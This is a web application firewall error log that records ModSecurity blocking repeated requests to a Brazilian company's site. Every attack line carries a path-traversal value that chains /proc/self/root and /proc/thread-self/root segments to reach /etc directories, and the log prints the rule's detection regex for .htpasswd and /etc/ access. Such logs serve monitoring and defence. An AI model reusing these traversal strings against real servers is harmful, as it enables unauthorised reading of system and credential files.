[Mon Mar 16 19:11:10.286943 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:59214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh__tSswJuvopo3lOiEVAAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:11:32.501352 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.241.46:43004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAFI6lpbStxTqkSkuMgwAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:11:46.319514 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.241.46:40578] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAIUr9dMAiw-8KANNscgAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:11:47.668848 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:34830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAI6TCbgAP5jq5TehOcQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:09.667058 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.228.16:35244] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiAOVajLEzk2WiQ-101-AAAApE"]
[Mon Mar 16 19:12:15.558134 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:45598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAP7ysWC90G-1nBrBpgwAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:16.902895 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.241.46:34968] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAQLysWC90G-1nBrBphgAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:20.211654 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:45362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiARLysWC90G-1nBrBpjAAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:26.141565 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:45370] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiASv9ocpUE4ed4uDwXPAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:34.465504 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:46400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAUqTCbgAP5jq5TehOsgAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:36.707008 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.241.46:45382] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAVLABkC4fWIHEf8Ec4QAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:37.972287 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.243.203:57796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAVUr9dMAiw-8KANNsgwAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:12:37.982911 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.241.46:54306] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAVc_BxrYCr4hPDw8OEwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:39.165503 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:60078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAV7ABkC4fWIHEf8Ec4gAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:40.497399 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:60080] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAWKQpVkWug9HeOt9XcgAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:43.417173 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:57802] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAW9SswJuvopo3lOiEfQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:12:43.827421 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:60082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAW7ABkC4fWIHEf8Ec6gAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:46.796884 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:60090] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAXrysWC90G-1nBrBprwAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:51.508130 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:60102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAY7ABkC4fWIHEf8Ec7gAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:52.811134 2026] [:error] [pid 29507:tid 140411733534464] [client 74.7.241.46:42680] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAZEr9dMAiw-8KANNshgAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:12:56.212959 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:42694] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAaLysWC90G-1nBrBpvQAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:13:01.838200 2026] [:error] [pid 29507:tid 140411582465792] [client 74.7.241.46:42698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiAbUr9dMAiw-8KANNsjQAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
